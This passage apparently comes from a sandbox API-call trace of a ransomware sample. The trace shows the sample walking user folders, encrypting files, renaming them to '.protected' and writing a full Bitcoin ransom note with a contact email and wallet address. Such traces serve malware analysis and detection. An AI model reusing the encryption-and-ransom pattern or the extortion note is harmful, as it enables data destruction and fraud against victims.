lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x18, lpOverlapped=0x0) returned 1 [0095.013] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.013] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0095.013] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0095.014] CloseHandle (hObject=0x14c) returned 1 [0095.014] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.protected") returned 73 [0095.014] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.protected" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist.protected")) returned 1 [0095.014] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0095.014] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="Windows") returned -1 [0095.014] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="Program Files") returned 1 [0095.014] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="Program Files (x86)") returned 1 [0095.014] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="$Recycle.bin") returned 1 [0095.014] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="System Volume Information") returned -1 [0095.014] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500") returned 100 [0095.014] lstrcmpW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2=".") returned 1 [0095.014] lstrcmpW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="..") returned 1 [0095.014] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*") returned 102 [0095.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0095.016] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.016] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.016] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.016] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.016] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.016] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\.") returned 102 [0095.016] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.016] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.016] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.016] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0095.016] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0095.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.016] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0095.016] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.016] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.016] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.016] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.016] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.016] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\..") returned 103 [0095.016] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.016] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.016] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.016] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.016] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0095.016] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0095.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.016] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0095.016] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="Windows") returned -1 [0095.016] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="Program Files") returned -1 [0095.016] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="Program Files (x86)") returned -1 [0095.016] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="$Recycle.bin") returned 1 [0095.017] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="System Volume Information") returned -1 [0095.017] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 137 [0095.017] StrStrIW (lpFirst="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpSrch=".protected") returned 0x0 [0095.017] lstrcmpW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="RESTORE_FILES.txt") returned -1 [0095.017] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0095.017] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0095.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0095.017] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 137 [0095.017] StrStrW (lpFirst="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpSrch=".txt") returned 0x0 [0095.017] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 137 [0095.017] StrStrW (lpFirst="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpSrch=".rar") returned 0x0 [0095.017] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 137 [0095.017] StrStrW (lpFirst="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpSrch=".zip") returned 0x0 [0095.018] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0095.018] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.019] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0095.019] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.019] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0095.019] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0095.019] CloseHandle (hObject=0x150) returned 1 [0095.019] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.protected") returned 147 [0095.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.protected" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.protected")) returned 1 [0095.020] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0095.020] lstrcmpiW (lpString1="Preferred", lpString2="Windows") returned -1 [0095.020] lstrcmpiW (lpString1="Preferred", lpString2="Program Files") returned -1 [0095.020] lstrcmpiW (lpString1="Preferred", lpString2="Program Files (x86)") returned -1 [0095.020] lstrcmpiW (lpString1="Preferred", lpString2="$Recycle.bin") returned 1 [0095.020] lstrcmpiW (lpString1="Preferred", lpString2="System Volume Information") returned -1 [0095.020] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 110 [0095.020] StrStrIW (lpFirst="Preferred", lpSrch=".protected") returned 0x0 [0095.020] lstrcmpW (lpString1="Preferred", lpString2="RESTORE_FILES.txt") returned -1 [0095.020] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0095.020] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0095.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0095.020] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 110 [0095.020] StrStrW (lpFirst="Preferred", lpSrch=".txt") returned 0x0 [0095.020] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 110 [0095.020] StrStrW (lpFirst="Preferred", lpSrch=".rar") returned 0x0 [0095.020] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 110 [0095.020] StrStrW (lpFirst="Preferred", lpSrch=".zip") returned 0x0 [0095.020] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x18, lpOverlapped=0x0) returned 1 [0095.021] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.021] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x18, lpOverlapped=0x0) returned 1 [0095.021] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.021] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0095.021] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0095.021] CloseHandle (hObject=0x150) returned 1 [0095.021] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.protected") returned 120 [0095.022] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.protected" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.protected")) returned 1 [0095.022] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0095.022] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0095.022] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\RESTORE_FILES.txt") returned 118 [0095.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0095.023] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.023] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0095.023] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.023] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0095.023] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.023] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0095.023] CloseHandle (hObject=0x14c) returned 1 [0095.024] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0095.024] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0095.024] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\RESTORE_FILES.txt") returned 72 [0095.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0095.041] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.041] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0095.042] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.042] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0095.042] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.042] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0095.042] CloseHandle (hObject=0xd8) returned 1 [0095.042] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0095.042] lstrcmpiW (lpString1="SystemCertificates", lpString2="Windows") returned -1 [0095.043] lstrcmpiW (lpString1="SystemCertificates", lpString2="Program Files") returned 1 [0095.043] lstrcmpiW (lpString1="SystemCertificates", lpString2="Program Files (x86)") returned 1 [0095.043] lstrcmpiW (lpString1="SystemCertificates", lpString2="$Recycle.bin") returned 1 [0095.043] lstrcmpiW (lpString1="SystemCertificates", lpString2="System Volume Information") returned 1 [0095.043] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned 65 [0095.043] lstrcmpW (lpString1="SystemCertificates", lpString2=".") returned 1 [0095.043] lstrcmpW (lpString1="SystemCertificates", lpString2="..") returned 1 [0095.043] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned 67 [0095.043] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0095.043] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.043] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.043] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.043] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 